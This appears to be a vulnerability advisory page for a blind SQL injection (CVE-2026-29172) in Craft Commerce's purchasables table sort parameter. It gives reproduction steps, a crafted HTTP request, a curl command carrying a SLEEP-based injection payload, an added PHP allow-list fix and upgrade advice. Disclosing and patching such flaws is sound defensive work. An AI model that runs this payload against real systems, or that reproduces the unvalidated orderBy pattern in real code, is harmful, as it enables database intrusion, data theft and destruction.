CVE-2026-29172
Craft Commerce is Vulnerable to SQL Injection in Commerce Purchasables Table Sorting
Description
## Summary

Craft Commerce is vulnerable to **SQL Injection** in the purchasables table endpoint. The `sort` parameter is split by `|` and the first part (the column name) is passed directly as an array key to `orderBy()` without whitelist validation. Yii2's query builder does **NOT** escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the `ORDER BY` clause.

---

## PoC

### Required Permissions

- General
  - Access the control panel
  - Access Craft Commerce
- Craft Commerce
  - Manage orders
  - Edit orders

### Steps to reproduce

1. Log in to the control panel
2. Navigate to **Commerce** > **Orders** > Create a new order
3. Click on "Add a line item" to show the purchasables table
4. Intercept the AJAX request and modify the `sort` parameter as follows:

   ```http
   GET /index.php?p=admin/actions/commerce/orders/purchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(2))|asc
   ```

5. Observe the delay in the response, confirming the injection

Alternatively, you can use the following `curl` (bash syntax) command (replace the cookie and target domain as needed):

```bash
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin%2Factions%2Fcommerce%2Forders%2Fpurchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(5))|asc'
```

### Impact

With this blind SQLi, an attacker can:

- **Exfiltrate data** character-by-character (same technique as [GHSA-pmgj-gmm4-jh6j](https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j)).
- **Modify or destroy data** (drop tables, update records, alter schema).
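Added example, not Craft Commerce's or Yii2's own code: the unsafe `sort` handling the summary describes, beside an allow-list check that refuses the payload above before it can become an `orderBy()` array key. The sortable column list and the helper names are assumptions.

```php
<?php
// Added example (not Craft Commerce code): validating a "column|direction"
// sort parameter before handing it to Yii2's Query::orderBy().
declare(strict_types=1);

/** Columns the purchasables table may be sorted by (assumed list). */
const SORTABLE_COLUMNS = ['id', 'sku', 'price', 'description'];

/**
 * Pattern from the advisory: the raw first part of `sort` becomes the array
 * key, which Yii2 passes through unquoted once it contains "(".
 */
function unsafeOrderBy(string $sort): array
{
    $parts = explode('|', $sort, 2);
    $direction = strtolower($parts[1] ?? 'asc');
    return [$parts[0] => $direction === 'desc' ? SORT_DESC : SORT_ASC];
}

/**
 * Hardened version: accept only known column names and directions, reject
 * everything else instead of trying to sanitize. Returns null on bad input.
 */
function safeOrderBy(string $sort): ?array
{
    $parts = explode('|', $sort, 2);
    $column = $parts[0];
    $direction = strtolower($parts[1] ?? 'asc');

    if (!in_array($column, SORTABLE_COLUMNS, true)) {
        return null; // "id,(SELECT SLEEP(2))" is refused here
    }
    if (!in_array($direction, ['asc', 'desc'], true)) {
        return null;
    }
    return [$column => $direction === 'desc' ? SORT_DESC : SORT_ASC];
}

// Constructed inputs: the advisory's payload and a legitimate sort value.
foreach (['id,(SELECT SLEEP(2))|asc', 'price|desc'] as $sort) {
    $checked = safeOrderBy($sort);
    echo $sort, ' => ', $checked === null ? 'rejected' : json_encode($checked), PHP_EOL;
}
// In the controller, fall back to a fixed default when validation fails:
// $query->orderBy(safeOrderBy($sortParam) ?? ['id' => SORT_ASC]);
```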
How to fix CVE-2026-29172
To remediate CVE-2026-29172, upgrade the affected package to a fixed version below.
- Craft Commerce: upgrade to 4.10.2 or later
Is CVE-2026-29172 being exploited?
Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.